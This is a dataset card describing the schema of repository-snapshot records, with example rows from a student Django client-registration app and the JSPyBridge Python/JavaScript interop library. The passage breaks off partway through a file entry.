Each record describes one repository snapshot, with the following fields:

| Field | Type | Observed range / values |
| --- | --- | --- |
| repo_name | string | length 5–114 |
| repo_url | string | length 24–133 |
| snapshot_id | string | length 40 (fixed) |
| revision_id | string | length 40 (fixed) |
| directory_id | string | length 40 (fixed) |
| branch_name | string (categorical) | 209 distinct values |
| visit_date | timestamp[ns] | |
| revision_date | timestamp[ns] | |
| committer_date | timestamp[ns] | |
| github_id | int64 | 9.83k–683M |
| star_events_count | int64 | 0–22.6k |
| fork_events_count | int64 | 0–4.15k |
| gha_license_id | string (categorical) | 17 distinct values |
| gha_created_at | timestamp[ns] | |
| gha_updated_at | timestamp[ns] | |
| gha_pushed_at | timestamp[ns] | |
| gha_language | string (categorical) | 115 distinct values |
| files | list | length 1–13.2k |
| num_files | int64 | 1–13.2k |
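A minimal sketch of loading and inspecting records with this schema via the Hugging Face `datasets` library; the dataset ID `"org/dataset"` below is a placeholder, not the real identifier for this dataset:

```python
from datasets import load_dataset

# "org/dataset" is a placeholder ID -- substitute the actual dataset path.
# Streaming avoids downloading the full corpus just to peek at a few rows.
ds = load_dataset("org/dataset", split="train", streaming=True)

for row in ds.take(2):
    print(row["repo_name"], row["branch_name"], row["num_files"])
    for f in row["files"]:
        # Each entry in `files` is a dict of per-file metadata plus the raw text.
        print("  ", f["path"], f["language"], f["length_bytes"], "bytes")
```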
Example row 1:

- repo_name: guilhermeulbriki/Django-CadastroClientes
- repo_url: https://github.com/guilhermeulbriki/Django-CadastroClientes
- snapshot_id: 3cc1ba59f6e941f273222248be6ade350d4a7c7f
- revision_id: c863415dffc33fbc154802c02607cbacc8e726b6
- directory_id: d0464a3ca6ac6ec972fafd5234161e5edf043978
- branch_name: refs/heads/master
- visit_date: 2020-09-22T12:21:47.246666
- revision_date: 2020-03-27T17:54:07
- committer_date: 2020-03-27T17:54:07
- github_id: 225191658
- star_events_count: 1
- fork_events_count: 0
- gha_license_id: null
- gha_created_at: null
- gha_updated_at: null
- gha_pushed_at: null
- gha_language: null
- files:
[ { "alpha_fraction": 0.5328185558319092, "alphanum_fraction": 0.5727155804634094, "avg_line_length": 32.78260803222656, "blob_id": "3ba806bfdf0ab9d0689a391b6160d158f94e893c", "content_id": "3fbae2f805e7dc89da96ba86ecd3548f72e26ca1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 777, "license_type": "no_license", "max_line_length": 114, "num_lines": 23, "path": "/clientes/migrations/0002_funcionario.py", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.7 on 2019-11-25 14:18\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('clientes', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Funcionario',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('nome', models.CharField(max_length=255, verbose_name='Nome')),\n ('apelido', models.CharField(max_length=255, verbose_name='Apelido')),\n ('snap', models.CharField(max_length=255, verbose_name='Snap')),\n ('cpf', models.CharField(max_length=255, verbose_name='CPF')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.8287292718887329, "alphanum_fraction": 0.8287292718887329, "avg_line_length": 35.20000076293945, "blob_id": "385ffc8ee12ddeb2b8242113d0e2dc2b90cb9366", "content_id": "7711fa3d8cf8f6188241e1cc7ca42b717708e068", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 185, "license_type": "no_license", "max_line_length": 131, "num_lines": 5, "path": "/README.md", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "# Django-CadastroClientes\n\nParte de um trabalho da disciplina de Tópicos Avançados durante o ensino médio, um sistema para cadastro de clientes e funcionários\n\nFoi utilizado DJANGO\n" }, { "alpha_fraction": 0.648809552192688, "alphanum_fraction": 0.648809552192688, "avg_line_length": 27.08333396911621, "blob_id": "70db9d4cace315e384fb85a7298d3ca091b724f6", "content_id": "1ceac15a23acf0426518b24f131ba42152a15f09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 336, "license_type": "no_license", "max_line_length": 56, "num_lines": 12, "path": "/clientes/forms.py", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "from django import forms\nfrom .models import Cliente, Funcionario\n\nclass ClienteForm(forms.ModelForm):\n class Meta:\n model = Cliente\n fields = ('nome', 'endereco', 'telefone', 'cpf')\n\nclass FuncionarioForm(forms.ModelForm):\n class Meta:\n model = Funcionario\n fields = ('nome', 'apelido', 'snap', 'cpf')" }, { "alpha_fraction": 0.8152173757553101, "alphanum_fraction": 0.8152173757553101, "avg_line_length": 21.5, "blob_id": "05e4fa4caabf58a03f864d7879497262b48af570", "content_id": "635ec0b7736e26eb1cd1e0deb229aa7d3ecb2f44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 92, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/clientes/admin.py", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "from django.contrib import admin\r\nfrom.models import Cliente\r\n\r\nadmin.site.register(Cliente)" }, { "alpha_fraction": 0.6957885026931763, "alphanum_fraction": 0.6957885026931763, "avg_line_length": 31.28358268737793, "blob_id": 
"3184fa565163a4c1974486d09326030cb72d1aad", "content_id": "0bdf4e3133b9f3716aebf2d38d82ba3df2f4a910", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2232, "license_type": "no_license", "max_line_length": 95, "num_lines": 67, "path": "/clientes/views.py", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "from datetime import datetime\r\nfrom django.shortcuts import render, redirect\r\nfrom django.http import HttpResponse\r\nfrom .models import Cliente, Funcionario\r\nfrom .forms import ClienteForm, FuncionarioForm\r\nfrom django.views.generic.edit import CreateView, UpdateView\r\nfrom django.urls import reverse_lazy\r\n\r\ndef home(request):\r\n clientes = Cliente.objects.all()\r\n funcionarios = Funcionario.objects.all()\r\n contexto = {\r\n 'clientes': clientes,\r\n 'funcionarios': funcionarios, \r\n }\r\n resposta = render(request, template_name=\"clientes/home.html\", context=contexto)\r\n return HttpResponse(resposta)\r\n\r\nclass ClienteCreateView(CreateView):\r\n model = Cliente\r\n form_class = ClienteForm\r\n template_name = \"clientes/cliente_form.html\"\r\n success_url = reverse_lazy('home')\r\n\r\nclass ClienteUpdateView(UpdateView):\r\n model = Cliente\r\n form_class = ClienteForm\r\n template_name = \"clientes/cliente_form.html\"\r\n success_url = reverse_lazy('home')\r\n\r\ndef detalhes_cliente(request, pk):\r\n cliente = Cliente.objects.get(pk=pk)\r\n contexto = {\r\n 'cliente': cliente, \r\n }\r\n resposta = render(request, template_name=\"clientes/cliente.html\", context=contexto)\r\n return HttpResponse(resposta)\r\n \r\ndef deleta_cliente(request, pk):\r\n cliente = Cliente.objects.get(pk=pk)\r\n cliente.delete()\r\n return redirect('home') \r\n\r\nclass FuncionarioCreateView(CreateView):\r\n model = Funcionario\r\n form_class = FuncionarioForm\r\n template_name = \"funcionarios/funcionario_form.html\"\r\n success_url = reverse_lazy('home')\r\n\r\nclass FuncionarioUpdateView(UpdateView):\r\n model = Funcionario\r\n form_class = FuncionarioForm\r\n template_name = \"funcionarios/funcionario_form.html\"\r\n success_url = reverse_lazy('home')\r\n\r\ndef detalhes_funcionario(request, pk):\r\n funcionario = Funcionario.objects.get(pk=pk)\r\n contexto = {\r\n 'funcionario': funcionario, \r\n }\r\n resposta = render(request, template_name=\"funcionarios/funcionario.html\", context=contexto)\r\n return HttpResponse(resposta)\r\n\r\ndef deleta_funcionario(request, pk):\r\n funcionario = Funcionario.objects.get(pk=pk)\r\n funcionario.delete()\r\n return redirect('home') \r\n" }, { "alpha_fraction": 0.7118977308273315, "alphanum_fraction": 0.7118977308273315, "avg_line_length": 61.5625, "blob_id": "217a0ea0ec48837d18e864d10977ea5b65f97c2e", "content_id": "859372f7b806a14eb83232c561edc1883c1a9948", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1017, "license_type": "no_license", "max_line_length": 115, "num_lines": 16, "path": "/aulatopicos/urls.py", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "from django.contrib import admin\r\nfrom django.urls import path\r\nfrom clientes import views as cliente_views\r\n\r\nurlpatterns = [\r\n path('', cliente_views.home, name='home'),\r\n path('cliente/add/', cliente_views.ClienteCreateView.as_view(), name=\"add_cliente\"),\r\n path('funcionario/add/', cliente_views.FuncionarioCreateView.as_view(), name=\"add_funcionario\"),\r\n 
path('cliente/<int:pk>/', cliente_views.detalhes_cliente, name=\"detalhes_cliente\"),\r\n path('funcionario/<int:pk>/', cliente_views.detalhes_funcionario, name=\"detalhes_funcionario\"),\r\n path('cliente/<int:pk>/update/', cliente_views.ClienteUpdateView.as_view(), name=\"update_cliente\"),\r\n path('cliente/<int:pk>/deleta/', cliente_views.deleta_cliente, name=\"deleta_cliente\"),\r\n path('funcionario/<int:pk>/update/', cliente_views.FuncionarioUpdateView.as_view(), name=\"update_funcionario\"),\r\n path('funcionario/<int:pk>/deleta/', cliente_views.deleta_funcionario, name=\"deleta_funcionario\"),\r\n path('admin/', admin.site.urls),\r\n]\r\n" }, { "alpha_fraction": 0.6770186424255371, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 47.53845977783203, "blob_id": "a9ea25eea8099317f9712943062139efcbc89fc9", "content_id": "42ef9e2e0dda75eb8fac0ceff73401f8ee399a70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 645, "license_type": "no_license", "max_line_length": 72, "num_lines": 13, "path": "/clientes/models.py", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "from django.db import models\r\n\r\nclass Cliente(models.Model):\r\n nome = models.CharField(max_length=255, verbose_name=\"Nome\")\r\n endereco = models.CharField(max_length=350, verbose_name=\"Endereço\")\r\n telefone = models.CharField(max_length=255, verbose_name=\"Telefone\")\r\n cpf = models.CharField(max_length=255, verbose_name=\"CPF\")\r\n\r\nclass Funcionario(models.Model):\r\n nome = models.CharField(max_length=255, verbose_name=\"Nome\")\r\n apelido = models.CharField(max_length=255, verbose_name=\"Apelido\")\r\n snap = models.CharField(max_length=255, verbose_name=\"Snap\")\r\n cpf = models.CharField(max_length=255, verbose_name=\"CPF\")\r\n" } ]
- num_files: 7
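The per-file `alpha_fraction` and `alphanum_fraction` metadata appear to be the share of alphabetic and alphanumeric characters in `text` (the two are equal for files containing no digits, which matches the `forms.py` entry above); a sketch of recomputing them under that assumption:

```python
def char_fractions(text: str) -> tuple[float, float]:
    # Assumed definitions: fraction of alphabetic and of alphanumeric
    # characters over the whole blob, including whitespace and punctuation.
    n = len(text) or 1
    alpha = sum(c.isalpha() for c in text) / n
    alnum = sum(c.isalnum() for c in text) / n
    return alpha, alnum

# Usage on one entry from a row's `files` list:
# alpha, alnum = char_fractions(row["files"][0]["text"])
```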
Example row 2:

- repo_name: ishan-marikar/JSPyBridge
- repo_url: https://github.com/ishan-marikar/JSPyBridge
- snapshot_id: fe6e003a07b4ee6923342fa54a473eae65ff44c0
- revision_id: 046152d27b0179d4c1f6c338bb6a77df2372ac0c
- directory_id: 042b45d8f8a1ecf03ce4ce440e021a7960418571
- branch_name: refs/heads/master
- visit_date: 2023-07-13T21:40:46.600109
- revision_date: 2021-09-01T21:05:49
- committer_date: 2021-09-01T21:05:49
- github_id: null
- star_events_count: 0
- fork_events_count: 0
- gha_license_id: null
- gha_created_at: null
- gha_updated_at: null
- gha_pushed_at: null
- gha_language: null
- files:
[ { "alpha_fraction": 0.736923336982727, "alphanum_fraction": 0.7401818037033081, "avg_line_length": 40.657142639160156, "blob_id": "5f59ceaa132892ef73145bee3ed85a8c5822a3a4", "content_id": "5ec993789f997f9cd536e89be8f14e8674d6dc1c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5831, "license_type": "permissive", "max_line_length": 350, "num_lines": 140, "path": "/docs/python.md", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "# Docs for bridge to call JavaSript from Python\n\n(See README.md for some additional details)\n\n* All function calls to JavaScript are thread synchronous\n* ES6 classes can be constructed without new\n* ES5 classes can be constructed with the .new psuedo method\n* Use `@On` decorator when binding event listeners. Use `off` to disable it.\n* All callbacks run on a dedicated callback thread. DO NOT BLOCK in a callback or all other events will be blocked. Instead:\n* Use the @AsyncTask decorator when you need to spawn a new thread for an async JS task.\n\n\n## Built-ins\n\nDependencies are automatically maanged through the library through the `require` function. If\nyou run into issues with dependencies, you can clear the internal `node_modules` folder cache\nby using `python3 -m javascript --clean` in a command line.\n\nYou can update the internal packages with `python3 -m javascript --update <npm package>`. \n\nYou can install a package internally by using `python3 -m javascript --install <npm package>`. Internally, whatever you place after --update will be passed to `npm install <...>`. For example, use `python3 -m javascript --install PrismarineJS/vec3` to install the `vec3` package from git.\n\n### imports\n\n```py\ndef require ( package_name: str, package_version: Optional[str] = None ) -> Void\n```\n\n* `package_name` : The name of the npm package you want to import. If you use a relative import\n (starting with . or /) then it will load the file relative to where your calling script is.\n* `package_version` : The version of the npm package you want to install. If blank, first try to\n require from the local or global npm registry. If not found, install the specified package name\n and version. These two combine to create a unique ID, for example `chalk--1.0`. This ensures two\n different versiond don't collide. This parameter is ignored for relative imports.\n\n### threads\n\nThis library provides some wrappers around threads. You aren't forced to use them, but they\nhelp you avoid boilerplate and are simple to use.\n\n```py\nfrom javascript import AsyncTask, start, stop, abort\n@AsyncTask(start=True)\ndef routine(task: TaskState):\n ...\n\n# The signatures for the above functions :\ndef start(fn: Function): ...\ndef stop(fn: Function): ...\ndef abort(fn: Function, killAfterSeconds: Optional[Int]): ...\nclass TaskState:\n sleeping: bool\n def wait(seconds: Int): ...\n sleep = wait # Sleep is an alias to wait.\n```\n\nThe AsyncTask decorator is a wrapper for creating threads. Any function you wrap with it will\nresult in the creation of a thread, bound to the specified function. It will *not* automatically\nstart the thread, unless `start` parameter is set to True. \n\nThe `start()`, `stop()` and `abort()` functions all relate to AsyncTask threads. If you didn't\nalready start a AsyncTask, you can programmatically start it later with `start(routine)`. If you\nwant a thread to stop, you can send a `stopping` signal to it. 
The first parameter to all AsyncTasks\nis a `TaskState` object. That object has a `stopping` variable, and a `wait` function. The stopping\nvariable indicates that the thread should exit immediately, and it's your responsibility to make\nsure it does. The `wait` function that exists in TaskState will sleep, but also automatically exit \nthe process once the `stopping` flag is True. \n\n```py\nimport time\nfrom javascript import AsyncTask, start, stop, abort\n@AsyncTask(start=False)\ndef routine(task: TaskState):\n while not task.stopping: # You can also just do `while True` as long as you use task.sleep and not time.sleep\n ... do some repeated task ...\n task.sleep(1) # Sleep for a bit to not block everything else\n\nstart(routine)\ntime.sleep(1)\nstop(routine)\n```\n\nIf you need to be 100% sure the thread has stopped, you can use `abort(fn, seconds)` function instead. This\nwill kill the thread if it doesn't kill in n seconds. It's not good pratice to kill Python threads, so\navoid this when possible. To avoid trouble, `stop()` does not force the thread to exit, it just asks.\n\n### events\n\nThis library provides some wrappers around EventEmitters. You must use them over the built-in\n`.on`, `.off` and `.once` methods of normal EventEmitters. You can still use `.emit` normally.\n\nThese wrappers are avaliable as `@On(emitter, eventName)`, `@Once(emitter, eventName)` and\nthe top-level `off(emitter, eventName, handlerFn)` function.\n\nNote that you are still able to use the `once` static function from Node.js's `emitter` library.\nThis library provides a default export for this, used as in the example below.\n\n```py\nfrom javascript import require, On, Once, off, once\nMyEmitter = require('./emitter.js')\n# New class instance\nmyEmitter = MyEmitter()\n# Decorator usage\n@On(myEmitter, 'increment')\ndef handleIncrement(this, counter):\n print(\"Incremented\", counter)\n # Stop listening. `this` is the this variable in JS.\n off(myEmitter, 'increment', handleIncrement)\n# Trigger the event handler\nmyEmitter.inc()\n```\n\n### expression evaluation\n\nYou can use the exported `eval_js` function to evaluate JavaScript code within the current Python context. The parameter to this function is a JS string to evaluate, with access to all the Python variables in scope. Make sure to use `await` anywhere you do a function call or a property access on a Python object. You can set variables without await.\n\n```julia\nimport javascript\n\ncountUntil = 9\nmyArray = [1]\nmyObject = { 'hello': '' }\n\n# Make sure you await everywhere you expect a JS call !\noutput = javascript.eval_js('''\n myObject['world'] = 'hello' \n for (let x = 0; x < countUntil; x++) {\n await myArray.append(2)\n }\n return 'it worked'\n''')\n\n# If we look at myArray and myObject, we should see it updated\nprint(output, myArray, myObject)\n```\n\nYou can also use it inline.\n```swift\nx_or_z = eval_js(''' obj.x ?? 
obj.z ''')\n```" }, { "alpha_fraction": 0.496613472700119, "alphanum_fraction": 0.49744129180908203, "avg_line_length": 35.10869598388672, "blob_id": "5456157cc10670651bcc1ae05736df192904a003", "content_id": "6ce73d6dbad8025068374a79210794fbe3d579f9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13291, "license_type": "permissive", "max_line_length": 99, "num_lines": 368, "path": "/src/pythonia/Bridge.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import inspect, importlib, importlib.util\nimport json, types, traceback, os, sys\nfrom proxy import Executor, Proxy\nfrom weakref import WeakValueDictionary\n\n\ndef python(method):\n return importlib.import_module(method, package=None)\n\n\ndef fileImport(moduleName, absolutePath, folderPath):\n if folderPath not in sys.path:\n sys.path.append(folderPath)\n spec = importlib.util.spec_from_file_location(moduleName, absolutePath)\n foo = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(foo)\n return foo\n\n\nclass Iterate:\n def __init__(self, v):\n self.what = v\n\n # If we have a normal iterator, we need to make it a generator\n if inspect.isgeneratorfunction(v):\n it = self.next_gen()\n elif hasattr(v, \"__iter__\"):\n it = self.next_iter()\n\n def next_iter():\n try:\n return next(it)\n except Exception:\n return \"$$STOPITER\"\n\n self.Next = next_iter\n\n def next_iter(self):\n for entry in self.what:\n yield entry\n return\n\n def next_gen(self):\n yield self.what()\n\n\nfix_key = lambda key: key.replace(\"~~\", \"\") if type(key) is str else key\n\n\nclass Bridge:\n m = {\n 0: {\n \"python\": python,\n \"open\": open,\n \"fileImport\": fileImport,\n \"eval\": eval,\n \"exec\": exec,\n \"setattr\": setattr,\n \"getattr\": getattr,\n \"Iterate\": Iterate,\n \"tuple\": tuple,\n \"set\": set,\n \"enumerate\": enumerate,\n \"repr\": repr,\n }\n }\n # Things added to this dict are auto GC'ed\n weakmap = WeakValueDictionary()\n cur_ffid = 0\n\n def __init__(self, ipc):\n self.ipc = ipc\n # This toggles if we want to send inspect data for console logging. 
It's auto\n # disabled when a for loop is active; use `repr` to request logging instead.\n self.m[0][\"sendInspect\"] = lambda x: setattr(self, \"send_inspect\", x)\n self.send_inspect = True\n self.q = lambda r, key, val, sig=\"\": self.ipc.queue(\n {\"r\": r, \"key\": key, \"val\": val, \"sig\": sig}\n )\n self.executor = Executor(self)\n\n setattr(os, \"JSPyBridge\", Proxy(self.executor, 0))\n\n def assign_ffid(self, what):\n self.cur_ffid += 1\n self.m[self.cur_ffid] = what\n return self.cur_ffid\n\n def make_class(this, name, proxy, bases, overriden):\n def init(self):\n for base_ffid, baseArgs, baseKwargs in bases:\n base = this.m[base_ffid]\n base.__init__(self, *baseArgs, **baseKwargs)\n\n def getAttribute(self, attr):\n if attr.startswith(\"__\"):\n return object.__getattribute__(self, attr)\n if attr.startswith(\"~~\"): # Bypass keyword for our __getattribute__ trap\n return super(clas, self).__getattribute__(attr[2:])\n if attr in overriden:\n return getattr(proxy, attr)\n return super(clas, self).__getattribute__(attr)\n\n def setAttr(self, attr, val):\n # Trippy stuff, but we need to set on both super and this\n # to avoid a mess\n super(clas, self).__setattr__(attr, val)\n object.__setattr__(self, attr, val)\n\n base_classes = []\n for base_ffid, a, kw in bases:\n base = this.m[base_ffid]\n base_classes.append(base)\n\n claz = type(base_classes[0])\n clas = type(\n name,\n tuple(base_classes),\n {\"__init__\": init, \"__getattribute__\": getAttribute, \"__setattr__\": setAttr},\n )\n inst = clas()\n setattr(proxy, \"~class\", inst)\n return inst\n\n # Here, we allocate two different refrences. The first is the Proxy to the JS\n # class, the send is a ref to our Python class. Both refs are GC tracked by JS.\n def makeclass(self, r, ffid, key, params):\n self.cur_ffid += 1\n js_ffid = self.cur_ffid\n proxy = Proxy(self.executor, js_ffid)\n self.m[js_ffid] = proxy\n inst = self.make_class(params[\"name\"], proxy, params[\"bases\"], params[\"overriden\"])\n py_ffid = self.assign_ffid(inst)\n self.q(r, \"inst\", [js_ffid, py_ffid])\n\n def length(self, r, ffid, keys, args):\n v = self.m[ffid]\n for key in keys:\n if type(v) in (dict, tuple, list):\n v = v[key]\n elif hasattr(v, str(key)):\n v = getattr(v, str(key))\n elif hasattr(v, \"__getitem__\"):\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n l = len(v)\n self.q(r, \"num\", l)\n\n def init(self, r, ffid, key, args):\n v = self.m[ffid](*args)\n ffid = self.assign_ffid(v)\n self.q(r, \"inst\", ffid)\n\n def call(self, r, ffid, keys, args, kwargs, invoke=True):\n v = self.m[ffid]\n # Subtle differences here depending on if we want to call or get a property.\n # Since in Python, items ([]) and attributes (.) function differently,\n # when calling first we want to try . then []\n # For example with the .append function we don't want ['append'] taking\n # precedence in a dict. 
However if we're only getting objects, we can\n # first try bracket for dicts, then attributes.\n if invoke:\n for key in keys:\n t = getattr(v, str(key), None)\n if t:\n v = t\n elif hasattr(v, \"__getitem__\"):\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n for key in keys:\n if type(v) in (dict, tuple, list):\n v = v[key]\n elif hasattr(v, str(key)):\n v = getattr(v, str(key))\n elif hasattr(v, \"__getitem__\"):\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n\n # Classes when called will return void, but we need to return\n # object to JS.\n was_class = False\n if invoke:\n if inspect.isclass(v):\n was_class = True\n v = v(*args, **kwargs)\n typ = type(v)\n if typ is str:\n self.q(r, \"string\", v)\n return\n if typ is int or typ is float or (v is None) or (v is True) or (v is False):\n self.q(r, \"int\", v)\n return\n if inspect.isclass(v) or isinstance(v, type):\n # We need to increment FFID\n self.q(r, \"class\", self.assign_ffid(v), self.make_signature(v))\n return\n if callable(v): # anything with __call__\n self.q(r, \"fn\", self.assign_ffid(v), self.make_signature(v))\n return\n if (typ is dict) or (inspect.ismodule(v)) or was_class: # \"object\" in JS speak\n self.q(r, \"obj\", self.assign_ffid(v), self.make_signature(v))\n return\n if typ is list:\n self.q(r, \"list\", self.assign_ffid(v), self.make_signature(v))\n return\n if hasattr(v, \"__class__\"): # numpy generator can't be picked up without this\n self.q(r, \"class\", self.assign_ffid(v), self.make_signature(v))\n return\n self.q(r, \"void\", self.cur_ffid)\n\n # Same as call just without invoking anything, and args\n # would be null\n def get(self, r, ffid, keys, args):\n o = self.call(r, ffid, keys, [], {}, invoke=False)\n return o\n\n def Set(self, r, ffid, keys, args):\n v = self.m[ffid]\n on, val = args\n for key in keys:\n if type(v) in (dict, tuple, list):\n v = v[key]\n elif hasattr(v, str(key)):\n v = getattr(v, str(key))\n else:\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n if type(v) in (dict, tuple, list, set):\n v[on] = val\n else:\n setattr(v, on, val)\n self.q(r, \"void\", self.cur_ffid)\n\n def inspect(self, r, ffid, keys, args):\n v = self.m[ffid]\n for key in keys:\n v = getattr(v, key, None) or v[key]\n s = repr(v)\n self.q(r, \"\", s)\n\n # no ACK needed\n def free(self, r, ffid, key, args):\n for i in args:\n if i not in self.m:\n continue\n del self.m[i]\n\n def make(self, r, ffid, key, args):\n self.cur_ffid += 1\n p = Proxy(self.executor, self.cur_ffid)\n # We need to put into both WeakMap and map to prevent immedate GC\n self.weakmap[self.cur_ffid] = p\n self.m[self.cur_ffid] = p\n self.ipc.queue({\"r\": r, \"val\": self.cur_ffid})\n\n def queue_request(self, request_id, payload, timeout=None):\n payload[\"c\"] = \"jsi\"\n self.ipc.queue(payload)\n\n def queue_request_raw(self, request_id, payload, timeout=None):\n self.ipc.queue(payload)\n\n def make_signature(self, what):\n if self.send_inspect:\n return repr(what)\n return \"\"\n\n def read(self):\n data = self.ipc.readline()\n if not data:\n exit()\n j = json.loads(data)\n return j\n\n def pcall(self, r, ffid, key, args, set_attr=False):\n created = {}\n # Convert 
special JSON objects to Python methods\n def process(json_input, lookup_key):\n if isinstance(json_input, dict):\n for k, v in json_input.items():\n if isinstance(v, dict) and (lookup_key in v):\n lookup = v[lookup_key]\n if lookup == \"\":\n self.cur_ffid += 1\n proxy = (\n self.m[v[\"extend\"]]\n if \"extend\" in v\n else Proxy(self.executor, self.cur_ffid)\n )\n self.weakmap[self.cur_ffid] = proxy\n json_input[k] = proxy\n created[v[\"r\"]] = self.cur_ffid\n else:\n json_input[k] = self.m[lookup]\n else:\n process(v, lookup_key)\n elif isinstance(json_input, list):\n for k, v in enumerate(json_input):\n if isinstance(v, dict) and (lookup_key in v):\n lookup = v[lookup_key]\n if lookup == \"\":\n self.cur_ffid += 1\n proxy = (\n self.m[v[\"extend\"]]\n if \"extend\" in v\n else Proxy(self.executor, self.cur_ffid)\n )\n self.weakmap[self.cur_ffid] = proxy\n json_input[k] = proxy\n created[v[\"r\"]] = self.cur_ffid\n else:\n json_input[k] = self.m[lookup]\n else:\n process(v, lookup_key)\n\n process(args, \"ffid\")\n pargs, kwargs = args\n if len(created):\n self.q(r, \"pre\", created)\n if set_attr:\n self.Set(r, ffid, key, pargs)\n else:\n self.call(r, ffid, key, pargs, kwargs or {})\n\n def setval(self, r, ffid, key, args):\n return self.pcall(r, ffid, key, args, set_attr=True)\n\n # This returns a primitive version (JSON-serialized) of the object\n # including arrays and dictionary/object maps, unlike what the .get\n # and .call methods do where they only return numeric/strings as\n # primitive values and everything else is an object refrence.\n def value(self, r, ffid, keys, args):\n v = self.m[ffid]\n\n for key in keys:\n t = getattr(v, str(key), None)\n if t is None:\n v = v[key] # 🚨 If you get an error here, you called an undefined property\n else:\n v = t\n\n # TODO: do we realy want to worry about functions/classes here?\n # we're only supposed to send primitives, probably best to ignore\n # everything else.\n # payload = json.dumps(v, default=lambda arg: None)\n self.q(r, \"ser\", v)\n\n def onMessage(self, r, action, ffid, key, args):\n try:\n return getattr(self, action)(r, ffid, key, args)\n except Exception:\n self.q(r, \"error\", \"\", traceback.format_exc())\n pass\n" }, { "alpha_fraction": 0.6373727917671204, "alphanum_fraction": 0.6373727917671204, "avg_line_length": 28.216217041015625, "blob_id": "b23c74f7455c64de657fe77bab6732527b01ed74", "content_id": "d1f55cabd20e041b99108f6becf11bbe1f204788", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1081, "license_type": "permissive", "max_line_length": 114, "num_lines": 37, "path": "/src/javascript/__main__.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import os, sys, argparse, shutil\n\nparser = argparse.ArgumentParser(\n description=\"javascript (JSPyBridge) package manager. 
Use this to clear or update the internal package store.\"\n)\nparser.add_argument(\"--clean\", default=False, action=\"store_true\")\nparser.add_argument(\"--update\", default=False, action=\"store_true\")\nparser.add_argument(\"--install\", default=False, action=\"store\")\nargs = parser.parse_args()\n\nif args.clean:\n d = os.path.dirname(__file__)\n nm = d + \"/js/node_modules/\"\n nl = d + \"/js/package-lock.json\"\n np = d + \"/js/package.json\"\n print(\"Deleting\", nm, nl, np)\n try:\n shutil.rmtree(nm)\n except Exception:\n pass\n try:\n os.remove(nl)\n except Exception:\n pass\n try:\n os.remove(np)\n except Exception:\n pass\nelif args.update:\n print(\"Updating package store\")\n os.chdir(os.path.dirname(__file__) + \"/js\")\n os.system(\"npm update\")\nelif args.install:\n os.chdir(os.path.dirname(__file__) + \"/js\")\n os.system(f\"npm install {args.install}\")\nelse:\n parser.print_help(sys.stderr)\n" }, { "alpha_fraction": 0.4869358539581299, "alphanum_fraction": 0.5083135366439819, "avg_line_length": 10.666666984558105, "blob_id": "a694b9aa033b07256dec3bf7745b478bcfd0e78b", "content_id": "672bc7e5f7ba4bda5f70409289a8df7ec3c1c73d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 421, "license_type": "permissive", "max_line_length": 54, "num_lines": 36, "path": "/test/pythonia/pyImp.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "print(\"hello world :)\")\n\n\ndef add_inverse(a, b):\n return -1 * (a + b)\n\n\ndef complex_num():\n return 1j * 1j\n\n\ndef inner():\n return 3\n\n\ndef some_event(cb, vfn):\n print(\"CB\", cb, vfn, vfn.someMethod(), vfn.get(3))\n cb(\"from python\", inner)\n\n\ndef iter(obj):\n ret = []\n for key in obj:\n ret.append(key)\n return ret\n\n\nx = [1, 2, 3]\ny = {\"a\": \"wow\", \"b\": \"naw\"}\n\n\nclass A:\n prop = 3\n\n\na = A()\n\n" }, { "alpha_fraction": 0.5523174405097961, "alphanum_fraction": 0.5681179761886597, "avg_line_length": 21.79199981689453, 